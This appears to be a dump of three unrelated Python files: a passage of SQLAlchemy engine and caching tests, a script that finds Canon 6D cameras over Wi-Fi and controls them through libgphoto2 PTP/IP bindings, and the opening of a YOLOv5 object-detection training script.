def evt1(dialect, conn_rec, cargs, cparams):
cargs[:] = ["foo", "hoho"]
cparams.clear()
cparams["bar"] = "bat"
conn_rec.info["boom"] = "one"
@event.listens_for(e, "do_connect")
def evt2(dialect, conn_rec, cargs, cparams):
conn_rec.info["bap"] = "two"
return m1.our_connect(cargs, cparams)
with e.connect() as conn:
# called with args
eq_(
m1.mock_calls,
[call.our_connect(["foo", "hoho"], {"bar": "bat"})],
)
eq_(conn.info["boom"], "one")
eq_(conn.info["bap"], "two")
# returned our mock connection
is_(conn.connection.dbapi_connection, m1.our_connect())
def test_connect_do_connect_info_there_after_recycle(self):
# test that info is maintained after the do_connect()
# event for a soft invalidation.
e = engines.testing_engine(options={"_initialize": False})
@event.listens_for(e, "do_connect")
def evt1(dialect, conn_rec, cargs, cparams):
conn_rec.info["boom"] = "one"
conn = e.connect()
eq_(conn.info["boom"], "one")
conn.connection.invalidate(soft=True)
conn.close()
conn = e.connect()
eq_(conn.info["boom"], "one")
def test_connect_do_connect_info_there_after_invalidate(self):
# test that info is maintained after the do_connect()
# event for a hard invalidation.
e = engines.testing_engine(options={"_initialize": False})
@event.listens_for(e, "do_connect")
def evt1(dialect, conn_rec, cargs, cparams):
assert not conn_rec.info
conn_rec.info["boom"] = "one"
conn = e.connect()
eq_(conn.info["boom"], "one")
conn.connection.invalidate()
conn = e.connect()
eq_(conn.info["boom"], "one")
class SetInputSizesTest(fixtures.TablesTest):
__backend__ = True
__requires__ = ("independent_connections",)
@classmethod
def define_tables(cls, metadata):
Table(
"users",
metadata,
Column("user_id", INT, primary_key=True, autoincrement=False),
Column("user_name", VARCHAR(20)),
)
@testing.fixture
def input_sizes_fixture(self, testing_engine):
canary = mock.Mock()
def do_set_input_sizes(cursor, list_of_tuples, context):
if not engine.dialect.positional:
# sort by "user_id", "user_name", or otherwise
# param name for a non-positional dialect, so that we can
# confirm the ordering. mostly a py2 thing probably can't
# occur on py3.6+ since we are passing dictionaries with
# "user_id", "user_name"
list_of_tuples = sorted(
list_of_tuples, key=lambda elem: elem[0]
)
canary.do_set_input_sizes(cursor, list_of_tuples, context)
def pre_exec(self):
self.translate_set_input_sizes = None
self.include_set_input_sizes = None
self.exclude_set_input_sizes = None
engine = testing_engine()
engine.connect().close()
# the idea of this test is we fully replace the dialect
# do_set_input_sizes with a mock, and we can then intercept
# the setting passed to the dialect. the test table uses very
# "safe" datatypes so that the DBAPI does not actually need
# setinputsizes() called in order to work.
with mock.patch.object(
engine.dialect, "bind_typing", BindTyping.SETINPUTSIZES
), mock.patch.object(
engine.dialect, "do_set_input_sizes", do_set_input_sizes
), mock.patch.object(
engine.dialect.execution_ctx_cls, "pre_exec", pre_exec
):
yield engine, canary
def test_set_input_sizes_no_event(self, input_sizes_fixture):
engine, canary = input_sizes_fixture
with engine.begin() as conn:
conn.execute(
self.tables.users.insert(),
[
{"user_id": 1, "user_name": "n1"},
{"user_id": 2, "user_name": "n2"},
],
)
eq_(
canary.mock_calls,
[
call.do_set_input_sizes(
mock.ANY,
[
(
"user_id",
mock.ANY,
testing.eq_type_affinity(Integer),
),
(
"user_name",
mock.ANY,
testing.eq_type_affinity(String),
),
],
mock.ANY,
)
],
)
def test_set_input_sizes_expanding_param(self, input_sizes_fixture):
engine, canary = input_sizes_fixture
with engine.connect() as conn:
conn.execute(
select(self.tables.users).where(
self.tables.users.c.user_name.in_(["x", "y", "z"])
)
)
eq_(
canary.mock_calls,
[
call.do_set_input_sizes(
mock.ANY,
[
(
"user_name_1_1",
mock.ANY,
testing.eq_type_affinity(String),
),
(
"user_name_1_2",
mock.ANY,
testing.eq_type_affinity(String),
),
(
"user_name_1_3",
mock.ANY,
testing.eq_type_affinity(String),
),
],
mock.ANY,
)
],
)
@testing.requires.tuple_in
def test_set_input_sizes_expanding_tuple_param(self, input_sizes_fixture):
engine, canary = input_sizes_fixture
from sqlalchemy import tuple_
with engine.connect() as conn:
conn.execute(
select(self.tables.users).where(
tuple_(
self.tables.users.c.user_id,
self.tables.users.c.user_name,
).in_([(1, "x"), (2, "y")])
)
)
eq_(
canary.mock_calls,
[
call.do_set_input_sizes(
mock.ANY,
[
(
"param_1_1_1",
mock.ANY,
testing.eq_type_affinity(Integer),
),
(
"param_1_1_2",
mock.ANY,
testing.eq_type_affinity(String),
),
(
"param_1_2_1",
mock.ANY,
testing.eq_type_affinity(Integer),
),
(
"param_1_2_2",
mock.ANY,
testing.eq_type_affinity(String),
),
],
mock.ANY,
)
],
)
def test_set_input_sizes_event(self, input_sizes_fixture):
engine, canary = input_sizes_fixture
SPECIAL_STRING = mock.Mock()
@event.listens_for(engine, "do_setinputsizes")
def do_setinputsizes(
inputsizes, cursor, statement, parameters, context
):
for k in inputsizes:
if k.type._type_affinity is String:
inputsizes[k] = (
SPECIAL_STRING,
None,
0,
)
with engine.begin() as conn:
conn.execute(
self.tables.users.insert(),
[
{"user_id": 1, "user_name": "n1"},
{"user_id": 2, "user_name": "n2"},
],
)
eq_(
canary.mock_calls,
[
call.do_set_input_sizes(
mock.ANY,
[
(
"user_id",
mock.ANY,
testing.eq_type_affinity(Integer),
),
(
"user_name",
(SPECIAL_STRING, None, 0),
testing.eq_type_affinity(String),
),
],
mock.ANY,
)
],
)
class DialectDoesntSupportCachingTest(fixtures.TestBase):
"""test the opt-in caching flag added in :ticket:`6184`."""
__only_on__ = "sqlite+pysqlite"
__requires__ = ("sqlite_memory",)
@testing.fixture()
def sqlite_no_cache_dialect(self, testing_engine):
from sqlalchemy.dialects.sqlite.pysqlite import SQLiteDialect_pysqlite
from sqlalchemy.dialects.sqlite.base import SQLiteCompiler
from sqlalchemy.sql import visitors
class MyCompiler(SQLiteCompiler):
def translate_select_structure(self, select_stmt, **kwargs):
select = select_stmt
if not getattr(select, "_mydialect_visit", None):
select = visitors.cloned_traverse(select_stmt, {}, {})
if select._limit_clause is not None:
# create a bindparam with a fixed name and hardcode
# it to the given limit. this breaks caching.
select._limit_clause = bindparam(
"limit", value=select._limit, literal_execute=True
)
select._mydialect_visit = True
return select
class MyDialect(SQLiteDialect_pysqlite):
statement_compiler = MyCompiler
supports_statement_cache = False
from sqlalchemy.dialects import registry
def go(name):
return MyDialect
with mock.patch.object(registry, "load", go):
eng = testing_engine()
yield eng
@testing.fixture
def data_fixture(self, sqlite_no_cache_dialect):
m = MetaData()
t = Table("t1", m, Column("x", Integer))
with sqlite_no_cache_dialect.begin() as conn:
t.create(conn)
conn.execute(t.insert(), [{"x": 1}, {"x": 2}, {"x": 3}, {"x": 4}])
return t
def test_no_cache(self, sqlite_no_cache_dialect, data_fixture):
eng = sqlite_no_cache_dialect
def go(lim):
with eng.connect() as conn:
result = conn.execute(
select(data_fixture).order_by(data_fixture.c.x).limit(lim)
)
return result
r1 = go(2)
r2 = go(3)
eq_(r1.all(), [(1,), (2,)])
eq_(r2.all(), [(1,), (2,), (3,)])
def test_it_caches(self, sqlite_no_cache_dialect, data_fixture):
eng = sqlite_no_cache_dialect
eng.dialect.__class__.supports_statement_cache = True
del eng.dialect.__dict__["_supports_statement_cache"]
def go(lim):
with eng.connect() as conn:
result = conn.execute(
select(data_fixture).order_by(data_fixture.c.x).limit(lim)
)
return result
r1 = go(2)
r2 = go(3)
eq_(r1.all(), [(1,), (2,)])
# wrong answer
eq_(
r2.all(),
[
(1,),
(2,),
],
)
|
c6dwifi.py
|
import ctypes
import socket
import threading
import time
import sys
from zeroconf import ServiceBrowser, Zeroconf
import logging
logger = logging.getLogger('c6dwifi')
logger.setLevel(logging.INFO)
libgphoto_names = ['libgphoto2.so.6', 'libgphoto2.6.dylib']
class GPhotoError(Exception):
def __init__(self, result, message):
self.result = result
self.message = message
def __str__(self):
return self.message + ' (' + str(self.result) + ')'
class GPhoto2Binder():
def __init__(self):
self.gphoto = self.find_gphoto2()
self.bind_gphoto()
self.GP_CAPTURE_IMAGE = 0
self.GP_CAPTURE_MOVIE = 1
self.GP_CAPTURE_SOUND = 2
self.GP_EVENT_UNKNOWN = 0
self.GP_EVENT_TIMEOUT = 1
self.GP_EVENT_FILE_ADDED = 2
self.GP_EVENT_FOLDER_ADDED = 3
self.GP_EVENT_CAPTURE_COMPLETE = 4
def get_gphoto(self):
return self.gphoto
@staticmethod
def find_gphoto2():
for libgphoto_name in libgphoto_names:
gphoto2_candidate = None
try:
gphoto2_candidate = ctypes.CDLL(libgphoto_name)
except OSError:
pass
if gphoto2_candidate is not None:
logger.info('Using {0}'.format(libgphoto_name))
return gphoto2_candidate
logger.error('No libgphoto2 found')
def bind_gphoto(self):
self.gphoto.gp_context_new.restype = ctypes.c_void_p
self.gphoto.gp_camera_init.argtypes = [ctypes.c_void_p, ctypes.c_void_p]
self.gphoto.gp_context_unref.argtypes = [ctypes.c_void_p]
self.gphoto.gp_abilities_list_lookup_model.argtypes = [ctypes.c_void_p, ctypes.c_char_p]
self.gphoto.gp_result_as_string.restype = ctypes.c_char_p
self.gphoto.gp_log_add_func.argtypes = [ctypes.c_int, ctypes.c_void_p, ctypes.c_void_p]
self.gphoto.gp_setting_set.argtypes = [ctypes.c_char_p, ctypes.c_char_p, ctypes.c_char_p]
self.gphoto.gp_camera_set_abilities.argtypes = [ctypes.c_void_p, ctypes.Structure]
class CameraAbilities(ctypes.Structure):
_fields_ = [('model', (ctypes.c_char * 128)), ('data', (ctypes.c_char * 4096))]
class CameraFilePath(ctypes.Structure):
_fields_ = [('name', (ctypes.c_char * 128)), ('folder', (ctypes.c_char * 1024))]
class GPhotoError(Exception):
def __init__(self, result, message):
self.result = result
self.message = message
def __str__(self):
return self.message + ' (' + str(self.result) + ')'
class Common:
log_label = 'Common'
def log(self, msg, debug=False):
logger.error('{0} {1}'.format(self.log_label, msg))
def debug(self, msg):
logger.error(msg)
def start(self):
def run():
self.log('started thread')
self.run()
self.log('finished thread')
self.log('starting thread')
self.thread = threading.Thread(target=run)
self.thread.start()
def join(self, timeout=None):
if not self.thread.isAlive():
pass
elif timeout:
self.thread.join(timeout=timeout)
else:
self.thread.join()
return not self.thread.isAlive()
def shutdown(self):
pass
class PTPIPCamera(Common):
log_label = 'PTPIPCamera'
def __init__(self, target, guid):
self.context = ctypes.c_void_p() # gphoto.gp_context_new()
self.target = target
self.guid = guid
self.handle = ctypes.c_void_p()
self.portlist = None
self.abilitylist = None
self.connected = False
self.cached_root = None
self.cached_time = 0
self.cache_expiry = 2 # seconds
self.gp2binder = GPhoto2Binder()
self.gphoto = self.gp2binder.get_gphoto()
def gphoto_check(self, result):
if result < 0:
message = self.gphoto.gp_result_as_string(result).decode()
raise GPhotoError(result, message)
return result
def encoded_path(self):
return ("ptpip:" + self.target).encode('utf-8')
def encoded_guid(self):
tmp = self.guid.split("-")
guid = []
l = lambda s: [s[i:i + 2:] for i in range(0, len(s), 2)][::-1]
for i in range(0, 3):
guid += l(tmp[i])
guid += tmp[3]
guid += tmp[4]
tmp = "".join(guid).lower()
guid = []
for i in range(0, len(tmp), 2):
guid.append(tmp[i:i + 2])
guid = ":".join(guid)
return guid.encode('utf-8')
def connect(self):
# allocate and initialise a new camera
self.debug('allocate camera')
res = self.gphoto.gp_camera_new(ctypes.pointer(self.handle))
self.gphoto_check(res)
# set model and guid in settings file
self.gphoto.gp_setting_set(b"gphoto2", b"model", b"PTP/IP Camera")
self.gphoto.gp_setting_set(b"ptp2_ip", b"guid", self.encoded_guid())
# load abilities
if not self.abilitylist:
self.debug('load abilities list')
self.abilitylist = ctypes.c_void_p()
self.gphoto.gp_abilities_list_new(ctypes.pointer(self.abilitylist))
res = self.gphoto.gp_abilities_list_load(self.abilitylist, self.context)
self.gphoto_check(res)
# search for model abilities
self.debug('search abilities list')
index = self.gphoto.gp_abilities_list_lookup_model(self.abilitylist, b'PTP/IP Camera')
self.gphoto_check(index)
self.debug('found at %d' % index)
# load abilities
self.debug('load abilities')
abilities = GPhoto2Binder.CameraAbilities()
res = self.gphoto.gp_abilities_list_get_abilities(self.abilitylist, index, ctypes.pointer(abilities))
self.gphoto_check(res)
# set camera abilities
self.debug('set camera abilities')
res = self.gphoto.gp_camera_set_abilities(self.handle, abilities)
self.gphoto_check(res)
# load port list
if not self.portlist:
self.debug('load port list')
self.portlist = ctypes.c_void_p()
self.gphoto.gp_port_info_list_new(ctypes.pointer(self.portlist))
res = self.gphoto.gp_port_info_list_load(self.portlist)
self.gphoto_check(res)
# find port info entry
self.debug('search for port info')
index = self.gphoto.gp_port_info_list_lookup_path(self.portlist, self.encoded_path())
self.gphoto_check(index)
self.debug('found at %d' % index)
# load port info entry
self.debug('load port info')
info = ctypes.c_void_p()
res = self.gphoto.gp_port_info_list_get_info(self.portlist, index, ctypes.pointer(info))
self.gphoto_check(res)
# set the camera with the appropriate port info
self.debug('set camera port')
res = self.gphoto.gp_camera_set_port_info(self.handle, info)
self.gphoto_check(res)
# load the port path for debugging
# if DEBUG:
# path = ctypes.c_char_p()
# res = self.gphoto.gp_port_info_get_path(info, ctypes.pointer(path))
# self.gphoto_check(res)
# self.debug(path.value)
# connect to camera
self.log('connecting...')
res = self.gphoto.gp_camera_init(self.handle, self.context)
self.gphoto_check(res)
self.log('connected.')
self.connected = True
return True
def disconnect(self):
self._clear_cache()
res = self.gphoto.gp_camera_exit(self.handle, self.context)
self.gphoto_check(res)
res = self.gphoto.gp_camera_unref(self.handle)
self.gphoto_check(res)
res = self.gphoto.gp_context_unref(self.context)
self.gphoto_check(res)
# FIXME: gphoto PTP/IP does not close sockets properly; try to work around?
def _root_widget(self):
now = time.time()
if (not self.cached_root) or abs(now - self.cached_time) > self.cache_expiry:
if not self.cached_root:
self.gphoto.gp_widget_free(self.cached_root)
self.cached_root = None
root = ctypes.c_void_p()
res = self.gphoto.gp_camera_get_config(self.handle, ctypes.pointer(root), self.context)
if res >= 0:
self.cached_root = root
self.cached_time = now
return self.cached_root
def _clear_cache(self):
if self.cached_root:
self.gphoto.gp_widget_free(self.cached_root)
self.cached_root = None
def _find_widget(self, label):
root = self._root_widget()
if root:
child = ctypes.c_void_p()
res = self.gphoto.gp_widget_get_child_by_name(root, ctypes.c_char_p(label), ctypes.pointer(child))
if res >= 0:
return (root, child)
return None
widget_types = {0: 'window',
1: 'section',
2: 'text',
3: 'range',
4: 'toggle',
5: 'radio',
6: 'menu',
7: 'button',
8: 'date'}
def _widget_type(self, pair):
(root, child) = pair
w_type = ctypes.c_int()
res = self.gphoto.gp_widget_get_type(child, ctypes.pointer(w_type))
self.gphoto_check(res)
w_type = w_type.value
if w_type in self.widget_types:
return self.widget_types[w_type]
else:
return 'unknown'
def _widget_value(self, pair):
(root, child) = pair
w_type = self._widget_type(pair)
if w_type == 'text' or w_type == 'menu' or w_type == 'radio':
ptr = ctypes.c_char_p()
res = self.gphoto.gp_widget_get_value(child, ctypes.pointer(ptr))
self.gphoto_check(res)
return (w_type, ptr.value)
elif w_type == 'range':
top = ctypes.c_float()
bottom = ctypes.c_float()
step = ctypes.c_float()
value = ctypes.c_float()
res = self.gphoto.gp_widget_get_range(child, ctypes.pointer(bottom), ctypes.pointer(top), ctypes.pointer(step))
self.gphoto_check(res)
res = self.gphoto.gp_widget_get_value(child, ctypes.pointer(value))
self.gphoto_check(res)
return (w_type, value.value, bottom.value, top.value, step.value)
elif w_type == 'toggle' or w_type == 'date':
value = ctypes.c_int()
res = self.gphoto.gp_widget_get_value(child, ctypes.pointer(value))
self.gphoto_check(res)
return (w_type, value.value)
else:
return None
def _match_choice(self, pair, value):
choices = self._widget_choices(pair)
if isinstance(value, int):
if (value >= 0) and (value < len(choices)):
return choices[value]
for (i, c) in zip(range(len(choices)), choices):
try:
if c == str(value):
return c
elif float(c) == float(value):
return c
elif int(c) == int(value):
return c
except:
pass
if isinstance(value, str):
return value
else:
return str(value)
def _widget_set(self, pair, value):
(root, child) = pair
w_type = self._widget_type(pair)
if w_type == 'toggle':
if value:
value = 1
else:
value = 0
elif w_type == 'range':
value = float(value)
elif (w_type == 'radio') or (w_type == 'menu'):
value = self._match_choice(pair, value)
if isinstance(value, int):
v = ctypes.c_int(value)
res = self.gphoto.gp_widget_set_value(child, ctypes.pointer(v))
return (res >= 0)
elif isinstance(value, float):
v = ctypes.c_float(float(value))
res = self.gphoto.gp_widget_set_value(child, ctypes.pointer(v))
return (res >= 0)
elif isinstance(value, str):
v = ctypes.c_char_p(value)
res = self.gphoto.gp_widget_set_value(child, v)
return (res >= 0)
else:
return False
def _widget_choices(self, pair):
(root, child) = pair
w_type = self._widget_type(pair)
if w_type == 'radio' or w_type == 'menu':
count = self.gphoto.gp_widget_count_choices(child)
if count > 0:
choices = []
for i in range(count):
ptr = ctypes.c_char_p()
res = self.gphoto.gp_widget_get_choice(child, i, ctypes.pointer(ptr))
self.gphoto_check(res)
choices.append(ptr.value)
return choices
return None
def get_config(self, label):
pair = self._find_widget(label)
value = None
if pair:
value = self._widget_value(pair)
return value
def get_config_choices(self, label):
pair = self._find_widget(label)
value = None
if pair:
value = self._widget_choices(pair)
return value
def set_config(self, label, value):
pair = self._find_widget(label)
result = False
if pair:
result = self._widget_set(pair, value)
if result:
res = self.gphoto.gp_camera_set_config(self.handle, pair[0], self.context)
result = (res >= 0)
return result
known_widgets = [
'uilock',
'bulb',
'drivemode',
'focusmode',
'autofocusdrive',
'manualfocusdrive',
'eoszoom',
'eoszoomposition',
'eosviewfinder',
'eosremoterelease',
'serialnumber',
'manufacturer',
'cameramodel',
'deviceversion',
'model',
'batterylevel',
'lensname',
'eosserialnumber',
'shuttercounter',
'availableshots',
'reviewtime',
'output',
'evfmode',
'ownername',
'artist',
'copyright',
'autopoweroff',
'imageformat',
'imageformatsd',
'iso',
'whitebalance',
'colortemperature',
'whitebalanceadjusta',
'whitebalanceadjustb',
'whitebalancexa',
'whitebalancexb',
'colorspace'
'exposurecompensation',
'focusmode',
'autoexposuremode',
'picturestyle',
'shutterspeed',
'bracketmode',
'aeb',
'aperture',
'capturetarget']
def list_config(self):
config = {}
for k in self.known_widgets:
config[k] = self.get_config(k)
return config
# XXX: this hangs waiting for response from camera
def trigger_capture(self):
res = self.gphoto.gp_camera_trigger_capture(self.handle, self.context)
try:
self.gphoto_check(res)
return True
except GPhotoError as e:
self.log(str(e))
return False
# XXX: this hangs waiting for response from camera
# def capture(self, capture_type=GP_CAPTURE_IMAGE):
# path = CameraFilePath()
# res = self.gphoto.gp_camera_capture(self.handle, ctypes.c_int(capture_type), ctypes.pointer(path), self.context)
# try:
# self.gphoto_check(res)
# return (path.folder, path.name)
# except GPhotoError as e:
# self.log(str(e))
# return None
def wait_for_event(self, timeout=10):
ev_type = ctypes.c_int()
data = ctypes.c_void_p()
res = self.gphoto.gp_camera_capture(self.handle,
ctypes.c_int(timeout),
ctypes.pointer(ev_type),
ctypes.pointer(data), self.context)
try:
self.gphoto_check(res)
return ev_type.value
except GPhotoError as e:
self.log(str(e))
return None
class Canon6DConnection(Common):
log_label = 'Canon6DConnection'
def __init__(self, ip, guid, callback):
self.ip = ip
self.guid = guid
self.callback = callback
def run(self):
self.log('started %s (%s)' % (self.ip, self.guid))
self.camera = PTPIPCamera(self.ip, self.guid)
try:
self.camera.connect()
print('connected to %s (%s)' % (self.ip, self.guid))
self.callback(self.camera)
except Exception as e:
logger.error('failed for {0} ({1}) - {2}'.format(self.ip, self.guid, e))
finally:
try:
self.camera.disconnect()
except:
pass
self.log('shutdown %s (%s)' % (self.ip, self.guid))
class Canon6DConnector(Common):
def __init__(self, callback):
self.callback = callback
self.connections = []
zeroconf = Zeroconf()
listener = self
browser = ServiceBrowser(zeroconf, "_ptp._tcp.local.", listener)
browser = ServiceBrowser(zeroconf, "_http._tcp.local.", listener)
browser = ServiceBrowser(zeroconf, "_dlna._tcp.local.", listener)
browser = ServiceBrowser(zeroconf, "_daap._tcp.local.", listener)
browser = ServiceBrowser(zeroconf, "_dacp._tcp.local.", listener)
browser = ServiceBrowser(zeroconf, "_touch-able._tcp.local.", listener)
browser = ServiceBrowser(zeroconf, "_rsp._tcp.local.", listener)
browser = ServiceBrowser(zeroconf, "_rsp._tcp.local.", listener)
try:
input("Press enter to exit...\n\n")
finally:
zeroconf.close()
def connect(self, ip, guid):
logger.error('Connecting to {0}, {1}'.format(ip, guid))
if len(self.connections) == 0:
connection = Canon6DConnection(ip, guid, self.callback)
connection.start()
self.connections.append(connection)
def remove_service(self, zeroconf, type, name):
print("Service %s removed" % (name,))
def add_service(self, zeroconf, type, name):
info = zeroconf.get_service_info(type, name)
print("Service %s added, service info: %s" % (name, info))
if info is not None:
try:
guid = info.properties[b'sid.canon.com'].decode()
ip = socket.inet_ntoa(info.address)
self.connect(ip, guid)
except:
logger.error('not a canon')
def test_callback(camera):
print('camera_main', camera.guid)
camera.set_config('capture', 1)
config = camera.list_config()
print('got config')
for k in sorted(config.keys()):
v = config[k]
if v and (v[0] == 'radio'):
print(k, v, camera.get_config_choices(k))
else:
print(k, v)
result = camera.set_config('aperture', '8.0')
print('set aperture', result)
result = camera.set_config('capturetarget', 'Memory card')
print('set memory card', result)
result = camera.set_config('eosremoterelease', 'Immediate')
print('trigger capture', result)
time.sleep(1)
def main(args):
Canon6DConnector(test_callback)
if __name__ == "__main__":
main(sys.argv[1:])
|
train.py
|
import argparse
import logging
import math
import os
import random
import time
from copy import deepcopy
from pathlib import Path
from threading import Thread
import numpy as np
import torch.distributed as dist
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
import torch.optim.lr_scheduler as lr_scheduler
import torch.utils.data
import yaml
from torch.cuda import amp
from torch.nn.parallel import DistributedDataParallel as DDP
from torch.utils.tensorboard import SummaryWriter
from tqdm import tqdm
import test # import test.py to get mAP after each epoch
from models.experimental import attempt_load
from models.yolo import Model
from utils.autoanchor import check_anchors
from utils.datasets import create_dataloader
from utils.general import labels_to_class_weights, increment_path, labels_to_image_weights, init_seeds, \
fitness, strip_optimizer, get_latest_run, check_dataset, check_file, check_git_status, check_img_size, \
check_requirements, print_mutation, set_logging, one_cycle, colorstr
from utils.google_utils import attempt_download
from utils.loss import ComputeLoss
from utils.plots import plot_images, plot_labels, plot_results, plot_evolution
from utils.torch_utils import ModelEMA, select_device, intersect_dicts, torch_distributed_zero_first, is_parallel
from utils.wandb_logging.wandb_utils import WandbLogger, check_wandb_resume
logger = logging.getLogger(__name__)
def train(hyp, opt, device, tb_writer=None):
logger.info(colorstr('hyperparameters: ') + ', '.join(f'{k}={v}' for k, v in hyp.items()))
save_dir, epochs, batch_size, total_batch_size, weights, rank = \
Path(opt.save_dir), opt.epochs, opt.batch_size, opt.total_batch_size, opt.weights, opt.global_rank
# Directories
wdir = save_dir / 'weights'
wdir.mkdir(parents=True, exist_ok=True) # make dir
last = wdir / 'last.pt'
best = wdir / 'best.pt'
results_file = save_dir / 'results.txt'
# Save run settings
with open(save_dir / 'hyp.yaml', 'w') as f:
yaml.dump(hyp, f, sort_keys=False)
with open(save_dir / 'opt.yaml', 'w') as f:
yaml.dump(vars(opt), f, sort_keys=False)
# Configure
plots = not opt.evolve # create plots
cuda = device.type != 'cpu'
init_seeds(2 + rank)
with open(opt.data) as f:
data_dict = yaml.load(f, Loader=yaml.SafeLoader) # data dict
is_coco = opt.data.endswith('coco.yaml')
# Logging- Doing this before checking the dataset. Might update data_dict
loggers = {'wandb': None} # loggers dict
if rank in [-1, 0]:
opt.hyp = hyp # add hyperparameters
run_id = torch.load(weights).get('wandb_id') if weights.endswith('.pt') and os.path.isfile(weights) else None
wandb_logger = WandbLogger(opt, Path(opt.save_dir).stem, run_id, data_dict)
loggers['wandb'] = wandb_logger.wandb
data_dict = wandb_logger.data_dict
if wandb_logger.wandb:
weights, epochs, hyp = opt.weights, opt.epochs, opt.hyp # WandbLogger might update weights, epochs if resuming
nc = 1 if opt.single_cls else int(data_dict['nc']) # number of classes
names = ['item'] if opt.single_cls and len(data_dict['names']) != 1 else data_dict['names'] # class names
assert len(names) == nc, '%g names found for nc=%g dataset in %s' % (len(names), nc, opt.data) # check
# Model
pretrained = weights.endswith('.pt')
if pretrained:
with torch_distributed_zero_first(rank):
attempt_download(weights) # download if not found locally
ckpt = torch.load(weights, map_location=device) # load checkpoint
model = Model(opt.cfg or ckpt['model'].yaml, ch=3, nc=nc, anchors=hyp.get('anchors')).to(device) # create
exclude = ['anchor'] if (opt.cfg or hyp.get('anchors')) and not opt.resume else [] # exclude keys
state_dict = ckpt['model'].float().state_dict() # to FP32
state_dict = intersect_dicts(state_dict, model.state_dict(), exclude=exclude) # intersect
model.load_state_dict(state_dict, strict=False) # load
logger.info('Transferred %g/%g items from %s' % (len(state_dict), len(model.state_dict()), weights)) # report
else:
model = Model(opt.cfg, ch=3, nc=nc, anchors=hyp.get('anchors')).to(device) # create
with torch_distributed_zero_first(rank):
check_dataset(data_dict) # check
train_path = data_dict['train']
test_path = data_dict['val']
# Freeze
freeze = [] # parameter names to freeze (full or partial)
for k, v in model.named_parameters():
v.requires_grad = True # train all layers
if any(x in k for x in freeze):
print('freezing %s' % k)
v.requires_grad = False
# Optimizer
nbs = 64 # nominal batch size
accumulate = max(round(nbs / total_batch_size), 1) # accumulate loss before optimizing
hyp['weight_decay'] *= total_batch_size * accumulate / nbs # scale weight_decay
logger.info(f"Scaled weight_decay = {hyp['weight_decay']}")
pg0, pg1, pg2 = [], [], [] # optimizer parameter groups
for k, v in model.named_modules():
if hasattr(v, 'bias') and isinstance(v.bias, nn.Parameter):
pg2.append(v.bias) # biases
if isinstance(v, nn.BatchNorm2d):
pg0.append(v.weight) # no decay
elif hasattr(v, 'weight') and isinstance(v.weight, nn.Parameter):
pg1.append(v.weight) # apply decay
if opt.adam:
optimizer = optim.Adam(pg0, lr=hyp['lr0'], betas=(hyp['momentum'], 0.999)) # adjust beta1 to momentum
else:
optimizer = optim.SGD(pg0, lr=hyp['lr0'], momentum=hyp['momentum'], nesterov=True)
optimizer.add_param_group({'params': pg1, 'weight_decay': hyp['weight_decay']}) # add pg1 with weight_decay
optimizer.add_param_group({'params': pg2}) # add pg2 (biases)
logger.info('Optimizer groups: %g .bias, %g conv.weight, %g other' % (len(pg2), len(pg1), len(pg0)))
del pg0, pg1, pg2
# Scheduler https://arxiv.org/pdf/1812.01187.pdf
# https://pytorch.org/docs/stable/_modules/torch/optim/lr_scheduler.html#OneCycleLR
if opt.linear_lr:
lf = lambda x: (1 - x / (epochs - 1)) * (1.0 - hyp['lrf']) + hyp['lrf'] # linear
else:
lf = one_cycle(1, hyp['lrf'], epochs) # cosine 1->hyp['lrf']
scheduler = lr_scheduler.LambdaLR(optimizer, lr_lambda=lf)
# plot_lr_scheduler(optimizer, scheduler, epochs)
# EMA
ema = ModelEMA(model) if rank in [-1, 0] else None
# Resume
start_epoch, best_fitness = 0, 0.0
if pretrained:
# Optimizer
if ckpt['optimizer'] is not None:
optimizer.load_state_dict(ckpt['optimizer'])
best_fitness = ckpt['best_fitness']
# EMA
if ema and ckpt.get('ema'):
ema.ema.load_state_dict(ckpt['ema'].float().state_dict())
ema.updates = ckpt['updates']
# Results
if ckpt.get('training_results') is not None:
results_file.write_text(ckpt['training_results']) # write results.txt
# Epochs
start_epoch = ckpt['epoch'] + 1
if opt.resume:
assert start_epoch > 0, '%s training to %g epochs is finished, nothing to resume.' % (weights, epochs)
if epochs < start_epoch:
logger.info('%s has been trained for %g epochs. Fine-tuning for %g additional epochs.' %
(weights, ckpt['epoch'], epochs))
epochs += ckpt['epoch'] # finetune additional epochs
del ckpt, state_dict
# Image sizes
gs = max(int(model.stride.max()), 32) # grid size (max stride)
nl = model.model[-1].nl # number of detection layers (used for scaling hyp['obj'])
imgsz, imgsz_test = [check_img_size(x, gs) for x in opt.img_size] # verify imgsz are gs-multiples
# DP mode
if cuda and rank == -1 and torch.cuda.device_count() > 1:
model = torch.nn.DataParallel(model)
# SyncBatchNorm
if opt.sync_bn and cuda and rank != -1:
model = torch.nn.SyncBatchNorm.convert_sync_batchnorm(model).to(device)
logger.info('Using SyncBatchNorm()')
# Trainloader
dataloader, dataset = create_dataloader(train_path, imgsz, batch_size, gs, opt,
hyp=hyp, augment=True, cache=opt.cache_images, rect=opt.rect, rank=rank,
world_size=opt.world_size, workers=opt.workers,
image_weights=opt.image_weights, quad=opt.quad, prefix=colorstr('train: '))
mlc = np.concatenate(dataset.labels, 0)[:, 0].max() # max label class
nb = len(dataloader) # number of batches
assert mlc < nc, 'Label class %g exceeds nc=%g in %s. Possible class labels are 0-%g' % (mlc, nc, opt.data, nc - 1)
# Process 0
if rank in [-1, 0]:
testloader = create_dataloader(test_path, imgsz_test, batch_size * 2, gs, opt, # testloader
hyp=hyp, cache=opt.cache_images and not opt.notest, rect=True, rank=-1,
world_size=opt.world_size, workers=opt.workers,
pad=0.5, prefix=colorstr('val: '))[0]
if not opt.resume:
labels = np.concatenate(dataset.labels, 0)
c = torch.tensor(labels[:, 0]) # classes
# cf = torch.bincount(c.long(), minlength=nc) + 1. # frequency
# model._initialize_biases(cf.to(device))
if plots:
plot_labels(labels, names, save_dir, loggers)
if tb_writer:
tb_writer.add_histogram('classes', c, 0)
# Anchors
if not opt.noautoanchor:
check_anchors(dataset, model=model, thr=hyp['anchor_t'], imgsz=imgsz)
model.half().float() # pre-reduce anchor precision
# DDP mode
if cuda and rank != -1:
model = DDP(model, device_ids=[opt.local_rank], output_device=opt.local_rank,
# nn.MultiheadAttention incompatibility with DDP https://github.com/pytorch/pytorch/issues/26698
find_unused_parameters=any(isinstance(layer, nn.MultiheadAttention) for layer in model.modules()))
# Model parameters
hyp['box'] *= 3. / nl # scale to layers
hyp['cls'] *= nc / 80. * 3. / nl # scale to classes and layers
hyp['obj'] *= (imgsz / 640) ** 2 * 3. / nl # scale to image size and layers
hyp['label_smoothing'] = opt.label_smoothing
